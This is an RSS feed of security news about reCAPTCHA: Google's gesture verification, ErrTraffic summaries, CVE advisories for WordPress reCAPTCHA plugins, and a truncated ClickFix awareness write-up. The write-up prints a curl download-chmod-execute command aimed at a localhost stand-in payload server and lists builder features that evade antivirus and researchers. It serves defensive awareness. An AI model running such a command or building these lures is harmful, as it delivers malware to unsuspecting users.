<guid isPermaLink="true">https://tsecurity.de/de/3610152/it-security-nachrichten/forget-traffic-lights-googles-recaptcha-may-ask-for-hand-gestures/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has introduced hand gesture verification for reCAPTCHA, a new method for verifying that a user is human. Google’s reCAPTCHA is part of Google Cloud Fraud Defense, a fraud and abuse prevention platform for bot, account, and transaction protection. It uses risk analysis and challenge-based verification to help organizations identify automated activity and suspicious behavior. The service is commonly deployed on login pages, registration forms, password reset pages, and checkout systems, where it can allow … <a href="https://www.helpnetsecurity.com/2026/06/19/google-recaptcha-hand-gesture-verification/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/19/google-recaptcha-hand-gesture-verification/">Forget traffic lights, Google’s reCAPTCHA may ask for hand gestures</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget traffic lights, Google’s reCAPTCHA may ask for hand gestures]]></title>
<description><![CDATA[Google has introduced hand gesture verification for reCAPTCHA, a new method for verifying that a user is human. Google’s reCAPTCHA is part of Google Cloud Fraud Defense, a fraud and abuse prevention platform for bot, account, and transaction protection. It…
Read more →
The post Forget traffic lig...]]></description>
<link>https://tsecurity.de/de/3610143/it-security-nachrichten/forget-traffic-lights-googles-recaptcha-may-ask-for-hand-gestures/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610143/it-security-nachrichten/forget-traffic-lights-googles-recaptcha-may-ask-for-hand-gestures/</guid>
<pubDate>Fri, 19 Jun 2026 13:08:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has introduced hand gesture verification for reCAPTCHA, a new method for verifying that a user is human. Google’s reCAPTCHA is part of Google Cloud Fraud Defense, a fraud and abuse prevention platform for bot, account, and transaction protection. It…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/forget-traffic-lights-googles-recaptcha-may-ask-for-hand-gestures/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/forget-traffic-lights-googles-recaptcha-may-ask-for-hand-gestures/">Forget traffic lights, Google’s reCAPTCHA may ask for hand gestures</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ErrTraffic MaaS Uses Fake reCAPTCHA and Cloudflare Turnstile Lures to Execute PowerShell Commands]]></title>
<description><![CDATA[A new and rapidly growing cybercrime tool called ErrTraffic is making waves across the threat landscape, targeting internet users through cleverly disguised verification screens. The framework tricks victims into running malicious PowerShell commands on their own machines, all while believing…
Re...]]></description>
<link>https://tsecurity.de/de/3604882/it-security-nachrichten/errtraffic-maas-uses-fake-recaptcha-and-cloudflare-turnstile-lures-to-execute-powershell-commands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604882/it-security-nachrichten/errtraffic-maas-uses-fake-recaptcha-and-cloudflare-turnstile-lures-to-execute-powershell-commands/</guid>
<pubDate>Wed, 17 Jun 2026 15:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new and rapidly growing cybercrime tool called ErrTraffic is making waves across the threat landscape, targeting internet users through cleverly disguised verification screens. The framework tricks victims into running malicious PowerShell commands on their own machines, all while believing…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/errtraffic-maas-uses-fake-recaptcha-and-cloudflare-turnstile-lures-to-execute-powershell-commands/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/errtraffic-maas-uses-fake-recaptcha-and-cloudflare-turnstile-lures-to-execute-powershell-commands/">ErrTraffic MaaS Uses Fake reCAPTCHA and Cloudflare Turnstile Lures to Execute PowerShell Commands</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ErrTraffic MaaS Uses Fake reCAPTCHA and Cloudflare Turnstile Lures to Execute PowerShell Commands]]></title>
<description><![CDATA[A new and rapidly growing cybercrime tool called ErrTraffic is making waves across the threat landscape, targeting internet users through cleverly disguised verification screens. The framework tricks victims into running malicious PowerShell commands on their own machines, all while believing the...]]></description>
<link>https://tsecurity.de/de/3604786/it-security-nachrichten/errtraffic-maas-uses-fake-recaptcha-and-cloudflare-turnstile-lures-to-execute-powershell-commands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604786/it-security-nachrichten/errtraffic-maas-uses-fake-recaptcha-and-cloudflare-turnstile-lures-to-execute-powershell-commands/</guid>
<pubDate>Wed, 17 Jun 2026 14:36:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new and rapidly growing cybercrime tool called ErrTraffic is making waves across the threat landscape, targeting internet users through cleverly disguised verification screens. The framework tricks victims into running malicious PowerShell commands on their own machines, all while believing they are simply completing a routine security check. It first appeared in late 2025 and […]</p>
<p>The post <a href="https://cybersecuritynews.com/errtraffic-maas-uses-fake-recaptcha-and-cloudflare-turnstile-lures/">ErrTraffic MaaS Uses Fake reCAPTCHA and Cloudflare Turnstile Lures to Execute PowerShell Commands</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Achtung Technik-Fans: Dieser neue Google-Schutz könnte euch den Zugang sperren]]></title>
<description><![CDATA[Wenn ihr mit Android tüftelt und dabei gern Google-frei bleibt, dürfte das künftig deutlich schwieriger werden. Ein neues reCAPTCHA wird zum Problem.]]></description>
<link>https://tsecurity.de/de/3586735/android-tipps/achtung-technik-fans-dieser-neue-google-schutz-koennte-euch-den-zugang-sperren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586735/android-tipps/achtung-technik-fans-dieser-neue-google-schutz-koennte-euch-den-zugang-sperren/</guid>
<pubDate>Wed, 10 Jun 2026 09:10:00 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn ihr mit Android tüftelt und dabei gern Google-frei bleibt, dürfte das künftig deutlich schwieriger werden. Ein neues reCAPTCHA wird zum Problem.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-5411 | webfactory Advanced Google reCAPTCHA Plugin up to 5.38 on WordPress Licensing save_ajax unrestricted upload (EUVD-2026-34889)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in webfactory Advanced Google reCAPTCHA Plugin up to 5.38 on WordPress. This affects the function save_ajax of the component Licensing Module. The manipulation results in unrestricted upload.

This vulnerability is known as CVE-2026-5411. It is pos...]]></description>
<link>https://tsecurity.de/de/3580074/sicherheitsluecken/cve-2026-5411-webfactory-advanced-google-recaptcha-plugin-up-to-538-on-wordpress-licensing-saveajax-unrestricted-upload-euvd-2026-34889/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580074/sicherheitsluecken/cve-2026-5411-webfactory-advanced-google-recaptcha-plugin-up-to-538-on-wordpress-licensing-saveajax-unrestricted-upload-euvd-2026-34889/</guid>
<pubDate>Sun, 07 Jun 2026 23:38:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/webfactory:advanced_google_recaptcha_plugin">webfactory Advanced Google reCAPTCHA Plugin up to 5.38</a> on WordPress. This affects the function <code>save_ajax</code> of the component <em>Licensing Module</em>. The manipulation results in unrestricted upload.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-5411">CVE-2026-5411</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-5415 | webfactory Advanced Google reCAPTCHA Plugin up to 5.38 on WordPress AJAX ajax_run_tool authentication bypass (EUVD-2026-34888)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in webfactory Advanced Google reCAPTCHA Plugin up to 5.38 on WordPress. This impacts the function ajax_run_tool of the component AJAX Handler. The manipulation leads to authentication bypass using alternate channel.

This vulnerability is l...]]></description>
<link>https://tsecurity.de/de/3579757/sicherheitsluecken/cve-2026-5415-webfactory-advanced-google-recaptcha-plugin-up-to-538-on-wordpress-ajax-ajaxruntool-authentication-bypass-euvd-2026-34888/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579757/sicherheitsluecken/cve-2026-5415-webfactory-advanced-google-recaptcha-plugin-up-to-538-on-wordpress-ajax-ajaxruntool-authentication-bypass-euvd-2026-34888/</guid>
<pubDate>Sun, 07 Jun 2026 19:38:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/webfactory:advanced_google_recaptcha_plugin">webfactory Advanced Google reCAPTCHA Plugin up to 5.38</a> on WordPress. This impacts the function <code>ajax_run_tool</code> of the component <em>AJAX Handler</em>. The manipulation leads to authentication bypass using alternate channel.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-5415">CVE-2026-5415</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10771 | crmeb crmeb_java 1.4 base64 Qrcode Endpoint RestTemplateUtil.java RestTemplate.getForEntity url server-side request forgery (Issue 35 / EUVD-2026-34182)]]></title>
<description><![CDATA[A vulnerability was found in crmeb crmeb_java 1.4. It has been declared as critical. Affected is the function RestTemplate.getForEntity of the file crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java of the component base64 Qrcode Endpoint. The manipulation of the argument url ...]]></description>
<link>https://tsecurity.de/de/3571320/sicherheitsluecken/cve-2026-10771-crmeb-crmebjava-14-base64-qrcode-endpoint-resttemplateutiljava-resttemplategetforentity-url-server-side-request-forgery-issue-35-euvd-2026-34182/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571320/sicherheitsluecken/cve-2026-10771-crmeb-crmebjava-14-base64-qrcode-endpoint-resttemplateutiljava-resttemplategetforentity-url-server-side-request-forgery-issue-35-euvd-2026-34182/</guid>
<pubDate>Thu, 04 Jun 2026 04:51:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/crmeb:crmeb_java">crmeb crmeb_java 1.4</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is the function <code>RestTemplate.getForEntity</code> of the file <em>crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java</em> of the component <em>base64 Qrcode Endpoint</em>. The manipulation of the argument <em>url</em> results in server-side request forgery.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-10771">CVE-2026-10771</a>. The attack can be executed remotely. Additionally, an exploit exists.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android-Community in Aufruhr: Googles neuer Schutz trifft die Falschen]]></title>
<description><![CDATA[Wenn ihr mit Android tüftelt und dabei gern Google-frei bleibt, dürfte das künftig deutlich schwieriger werden. Ein neues reCAPTCHA wird zum Problem.]]></description>
<link>https://tsecurity.de/de/3569655/android-tipps/android-community-in-aufruhr-googles-neuer-schutz-trifft-die-falschen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569655/android-tipps/android-community-in-aufruhr-googles-neuer-schutz-trifft-die-falschen/</guid>
<pubDate>Wed, 03 Jun 2026 15:06:55 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn ihr mit Android tüftelt und dabei gern Google-frei bleibt, dürfte das künftig deutlich schwieriger werden. Ein neues reCAPTCHA wird zum Problem.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-2374 | robertpeake Login No Captcha reCAPTCHA Plugin up to 1.8.0 on WordPress xmlrpc.php authenticate PHP_SELF cross site scripting (CNNVD-202605-6649)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in robertpeake Login No Captcha reCAPTCHA Plugin up to 1.8.0 on WordPress. This affects the function Authenticate of the file xmlrpc.php. Performing a manipulation of the argument PHP_SELF results in cross site scripting.

This vulnerabilit...]]></description>
<link>https://tsecurity.de/de/3557789/sicherheitsluecken/cve-2026-2374-robertpeake-login-no-captcha-recaptcha-plugin-up-to-180-on-wordpress-xmlrpcphp-authenticate-phpself-cross-site-scripting-cnnvd-202605-6649/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557789/sicherheitsluecken/cve-2026-2374-robertpeake-login-no-captcha-recaptcha-plugin-up-to-180-on-wordpress-xmlrpcphp-authenticate-phpself-cross-site-scripting-cnnvd-202605-6649/</guid>
<pubDate>Sat, 30 May 2026 01:15:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/robertpeake:login_no_captcha_recaptcha_plugin">robertpeake Login No Captcha reCAPTCHA Plugin up to 1.8.0</a> on WordPress. This affects the function <code>Authenticate</code> of the file <em>xmlrpc.php</em>. Performing a manipulation of the argument <em>PHP_SELF</em> results in cross site scripting.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-2374">CVE-2026-2374</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Schlechte Nachrichten für Android-Tüftler: Googles neuer Bot-Schutz könnte euch bald aussperren]]></title>
<description><![CDATA[Wenn ihr mit Android tüftelt und dabei gern Google-frei bleibt, dürfte das künftig deutlich schwieriger werden. Ein neues reCAPTCHA wird zum Problem.]]></description>
<link>https://tsecurity.de/de/3550153/android-tipps/schlechte-nachrichten-fuer-android-tueftler-googles-neuer-bot-schutz-koennte-euch-bald-aussperren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550153/android-tipps/schlechte-nachrichten-fuer-android-tueftler-googles-neuer-bot-schutz-koennte-euch-bald-aussperren/</guid>
<pubDate>Wed, 27 May 2026 09:24:52 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn ihr mit Android tüftelt und dabei gern Google-frei bleibt, dürfte das künftig deutlich schwieriger werden. Ein neues reCAPTCHA wird zum Problem.]]></content:encoded>
</item>
<item>
<title><![CDATA[Captcha ohne Google: 4 europäische Alternativen im Vergleich]]></title>
<description><![CDATA[Der Beitrag Captcha ohne Google: 4 europäische Alternativen im Vergleich erschien zuerst beim Online-Magazin BASIC thinking. Über unseren Newsletter UPDATE startest du jeden Morgen bestens informiert in den Tag.
Googles reCaptcha ist auf Millionen Websites im Einsatz, doch immer mehr europäische ...]]></description>
<link>https://tsecurity.de/de/3544623/it-nachrichten/captcha-ohne-google-4-europaeische-alternativen-im-vergleich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544623/it-nachrichten/captcha-ohne-google-4-europaeische-alternativen-im-vergleich/</guid>
<pubDate>Mon, 25 May 2026 05:47:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/05/25/captcha-ohne-google-europaeische-alternativen-im-vergleich/">Captcha ohne Google: 4 europäische Alternativen im Vergleich</a> erschien zuerst beim Online-Magazin <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Über <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a> startest du jeden Morgen bestens informiert in den Tag.</p>
<p>Googles reCaptcha ist auf Millionen Websites im Einsatz, doch immer mehr europäische Unternehmen suchen nach Alternativen mit konsequentem Datenschutz. Inzwischen gibt es gleich vier Captcha-Dienste, die komplett innerhalb der EU gehostet werden und ohne Cookies oder Tracking auskommen. Wir haben Trustcaptcha, Private Captcha, CaptchaFox und Myra EU CAPTCHA verglichen und zeigen, welcher Dienst zu welchen […]</p>
<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/05/25/captcha-ohne-google-europaeische-alternativen-im-vergleich/">Captcha ohne Google: 4 europäische Alternativen im Vergleich</a> erschien zuerst auf <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Folge uns auch auf <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV0poYzJsamRHaHBibXRwYm1jdVpHVXZZbXh2WnlnQVAB" target="_blank">Google News</a> und <a href="https://flipboard.com/@BASICthinking" target="_blank">Flipboard</a> oder abonniere <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Reverse Engineered Google reCAPTCHA]]></title>
<description><![CDATA[submitted by    /u/Dapper-Profession552   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3539460/reverse-engineering/reverse-engineered-google-recaptcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3539460/reverse-engineering/reverse-engineered-google-recaptcha/</guid>
<pubDate>Fri, 22 May 2026 14:06:09 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Dapper-Profession552"> /u/Dapper-Profession552 </a> <br> <span><a href="https://github.com/elyelysiox/recaptcha">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1tka9s2/reverse_engineered_google_recaptcha/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44363 | MISP misp-modules up to 3.0.6 Qrcode html_to_markdown certificate validation (GHSA-fhq3-2gf3-8f3j / WID-SEC-2026-1547)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in MISP misp-modules up to 3.0.6. The affected element is the function html_to_markdown of the component Qrcode Module. The manipulation leads to improper certificate validation.

This vulnerability is listed as CVE-2026-44363. The attac...]]></description>
<link>https://tsecurity.de/de/3521156/sicherheitsluecken/cve-2026-44363-misp-misp-modules-up-to-306-qrcode-htmltomarkdown-certificate-validation-ghsa-fhq3-2gf3-8f3j-wid-sec-2026-1547/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3521156/sicherheitsluecken/cve-2026-44363-misp-misp-modules-up-to-306-qrcode-htmltomarkdown-certificate-validation-ghsa-fhq3-2gf3-8f3j-wid-sec-2026-1547/</guid>
<pubDate>Sat, 16 May 2026 02:07:54 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/misp:misp-modules">MISP misp-modules up to 3.0.6</a>. The affected element is the function <code>html_to_markdown</code> of the component <em>Qrcode Module</em>. The manipulation leads to improper certificate validation.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-44363">CVE-2026-44363</a>. The attack may be initiated remotely. There is no available exploit.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Internet nur noch mit Android oder iOS? Googles reCAPTCHA-Forderung]]></title>
<description><![CDATA[Werden alternative Betriebssysteme bald ausgesperrt? Google fordert für reCAPTCHA nun QR-Scans von zertifizierten Android- oder iOS-Geräten zur Verifizierung.

Tags: #CAPTCHAs | #Google]]></description>
<link>https://tsecurity.de/de/3518413/it-security-nachrichten/internet-nur-noch-mit-android-oder-ios-googles-recaptcha-forderung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3518413/it-security-nachrichten/internet-nur-noch-mit-android-oder-ios-googles-recaptcha-forderung/</guid>
<pubDate>Fri, 15 May 2026 06:37:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920.jpg" class="attachment-full size-full wp-post-image" alt="Google, recaptcha fake, fake recaptcha site, recaptcha missbrauch, recaptcha gefälscht, reCAPTCHA, Fake" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/05/reCAPTCHA-Quelle-Rokas-Tenys-Shutterstock.com_2345219979_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Internet nur noch mit Android oder iOS? Googles reCAPTCHA-Forderung 3"></p>
    Werden alternative Betriebssysteme bald ausgesperrt? Google fordert für reCAPTCHA nun QR-Scans von zertifizierten Android- oder iOS-Geräten zur Verifizierung.

<p>Tags: <a href="https://www.it-daily.net/thema/captchas">#CAPTCHAs</a> | <a href="https://www.it-daily.net/thema/google">#Google</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix Attack Exposed: How Fake CAPTCHA Delivers Malware]]></title>
<description><![CDATA[How One Click on a Fake CAPTCHA Can Compromise Your Entire DeviceYou visit a website. A CAPTCHA pops up, it looks exactly like a real Cloudflare or Google verification. You click “I’m not a robot.” Then it asks you to run a quick command to complete verification. You do it. Your computer is now i...]]></description>
<link>https://tsecurity.de/de/3516568/hacking/clickfix-attack-exposed-how-fake-captcha-delivers-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516568/hacking/clickfix-attack-exposed-how-fake-captcha-delivers-malware/</guid>
<pubDate>Thu, 14 May 2026 13:39:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>How One Click on a Fake CAPTCHA Can Compromise Your Entire Device</p><p>You visit a website. A CAPTCHA pops up, it looks exactly like a real Cloudflare or Google verification. You click “I’m not a robot.” Then it asks you to run a quick command to complete verification. You do it. Your computer is now infected. This is a ClickFix attack, and it’s spreading rapidly in 2026.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Cg9RYuksRuAxkYH_ReX7cg.png"></figure><p><strong>Table of Contents</strong> <br>1. What Is a ClickFix Attack? <br>2. How Does It Work? — Step by Step <br>3. Inside the ClickFix Builder Tool <br>4. The Fake CAPTCHA in Action <br>5. Malicious Command Execution <br>6. What Malware Gets Delivered? <br>7. Why This Attack Is So Dangerous <br>8. Indicators of Compromise (IOCs) <br>9. How to Protect Yourself <br>10. Conclusion</p><p><strong>01 What Is a ClickFix Attack?</strong></p><p>A ClickFix attack is a social engineering technique where attackers trick users into running malicious commands under the guise of “fixing” an issue or completing a verification step. Unlike traditional malware that silently installs itself, ClickFix makes the victim do all the work, which is exactly what makes it so effective. The attack does not exploit any software vulnerability. There is no hacking involved in the technical sense. Instead, it exploits human trust, specifically, the trust users have built with everyday verification systems like Cloudflare and Google reCAPTCHA.</p><p><strong>How It Works — Brief Explanation<br>1.</strong> The victim lands on a compromised or fake website</p><p><strong>2</strong>. A message appears claiming something is broken, “browser error,” “CAPTCHA failed,” or “update required.”</p><p><strong>3.</strong> The site instructs the user to copy and paste a command into tools like PowerShell, Command Prompt, or the Run dialog</p><p><strong>4.</strong> Once executed, that command silently downloads and runs malware on the victim’s device</p><p><strong>Key Takeaway:</strong> ClickFix attacks don’t exploit software vulnerabilities. They exploit <strong>human behavior</strong> by turning the user into the execution mechanism. No patch can fix this; only awareness can.</p><p><strong>02 How Does It Work? — Step by Step</strong></p><p>The attack follows a carefully designed psychological flow. Each step builds false trust and pushes the victim closer to the final action, running a malicious command on their own machine.</p><p><strong>1. Victim Visits a Fake or Compromised Website:</strong> The attacker either hacks a legitimate website or creates a convincing fake one. The victim arrives through a search result, social media link, or phishing message.</p><p><strong>2. A Fake Verification Page Appears:</strong> A realistic Cloudflare or reCAPTCHA screen appears, saying “Verify you are human by completing the action below.” It looks identical to the real thing.</p><p><strong>3. Victim Clicks “I’m Not a Robot”:</strong> Clicking the checkbox silently copies a malicious command to the victim’s clipboard. They have no idea this has happened.</p><p><strong>4. Instructions to “Complete Verification”:</strong> The page then tells the victim to open their terminal or PowerShell, paste the copied command, and press Enter to “finish verification.”</p><p><strong>5. Malware Executes Silently:</strong> The victim pastes and runs the command. Within seconds, it downloads and executes a malware payload, an info stealer, RAT, or ransomware loader.</p><p><strong>03 Inside the ClickFix Builder Tool</strong></p><p>During our research at ThreatWatch360, we got access to a ClickFix Builder, a ready-made toolkit that lets attackers generate and deploy these fake CAPTCHA pages with zero coding knowledge. The tool has a polished GUI with a Build Center, VPS Control panel, and real-time monitoring.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*00krDAt6B1qGYaVsOLudDw.png"></figure><p><strong>Builder Features</strong></p><p><strong>What the ClickFix Builder Offers: <br>1. Payload Command field:</strong> attacker pastes their malicious curl/PowerShell command here <br><strong>2. Build Modes:</strong> “Portable File” for quick local testing, “VPS Deploy” for live attacks <br><strong>3. Advanced Base64 Dropper:</strong> encodes the payload to evade antivirus detection <br><strong>4. Custom URL field:</strong> points to attacker-controlled payload server <br><strong>5. IP Blocking Rules:</strong> blocks security researchers and sandboxes from analyzing the page <br><strong>6. Real-time System Log:</strong> shows live connections as victims trigger the fake CAPTCHA</p><p><strong>What this means:</strong> An attacker with no programming skills can set up a live ClickFix attack in under 10 minutes. The builder handles everything: page generation, payload delivery, and live monitoring.</p><p><strong>04 The Fake CAPTCHA in Action</strong></p><p>Once deployed, the fake CAPTCHA page looks almost identical to a real Cloudflare or Google verification screen. There are two main variants attackers use: the fake Cloudflare check and the fake reCAPTCHA. Here is exactly what the victim sees.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1TZOzOO2HOvFsW9B6guSmw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*e7eKo1khYAoIghu68qZqyg.png"></figure><p>Notice how both pages use real branding, real fonts, and accurate color schemes from Cloudflare and Google. The average user has no reason to suspect anything is wrong. This is what makes the ClickFix attack so devastatingly effective; it weaponizes the trust users have built with these legitimate services over the years.</p><p><strong>05 Malicious Command Execution — What Really Happens</strong></p><p>This is the most critical stage of the attack. After the victim clicks the fake checkbox, the page reveals “Verification Steps” — step-by-step instructions that guide the victim into executing the malware themselves.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bPO7O7NcRz3nScJYUW8iNg.png"></figure><p><strong>The malicious command used in this attack: </strong>curl<a href="http://127.0.0.1:8000/payload.sh">http://127.0.0.1:8000/payload.sh</a> -o <a href="http://payload.sh/">payload.sh</a> &amp;&amp; chmod +x <a href="http://payload.sh/">payload.sh</a> &amp;&amp; ./<a href="http://payload.sh/">payload.sh</a></p><p><strong><em>This single line:</em></strong><em> downloads a shell script from the attacker’s server → makes it executable → runs it immediately. All in one command, completed in seconds.</em></p><p>The victim sees the terminal output scrolling and assumes verification is completing. In reality, the attacker’s payload is already running silently in the background, stealing data, installing backdoors, or preparing to encrypt files.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lmkScJuq77Cu3GnCMVuPZQ.png"></figure><p>Why we used ThreatWatch360 as the test target: To demonstrate the attack in a safe, controlled environment without causing real harm. In an actual attack, this step would install an info stealer, open a C2 connection, or begin ransomware encryption.</p><p><strong>06 What Malware Gets Delivered?</strong></p><p>The ClickFix builder is payload-agnostic, meaning the attacker decides what malware gets delivered. The fake CAPTCHA is simply the delivery mechanism. In real-world attacks observed through 2025 and 2026, three types of malware are most commonly deployed:</p><p><strong>1. Info Stealers: </strong>Steals saved passwords, browser cookies, credit card data, and crypto wallet keys from the victim’s device</p><p><strong>2. Remote Access Trojans (RATs): </strong>Gives the attacker full remote control of the victim’s computer files, webcam, microphone, and keystrokes</p><p><strong>3. Ransomware Loaders: </strong>Downloads and installs ransomware that encrypts all files on the device and demands payment to restore access</p><p><strong>Why ClickFix bypasses antivirus:</strong> Because the user runs the command themselves, most endpoint security tools do not flag it. The execution looks like a normal user-initiated action, not an automated attack. Security tools are built to stop software from installing malware, not people.</p><p><strong>07</strong> <strong>Why This Attack Is So Dangerous</strong></p><p>ClickFix is particularly alarming because it defeats nearly every layer of traditional cybersecurity defense simultaneously:</p><p><strong>Risk Assessment</strong></p><ol><li><strong>Bypasses antivirus and EDR tools:</strong> The user, not software, executes the payload, so security tools see a “trusted” action</li><li><strong>No file download visible: </strong>Many variants run scripts directly from memory, leaving nothing on disk for scanners to detect</li><li><strong>Exploits trusted brand recognition: </strong>Cloudflare and Google CAPTCHA are things users see every single day, so they don’t question them</li><li><strong>Works on every operating system: </strong>Windows (PowerShell/Run dialog), macOS (Terminal), and Linux (Terminal) variants all exist</li><li><strong>Zero technical skill required: </strong>The builder GUI 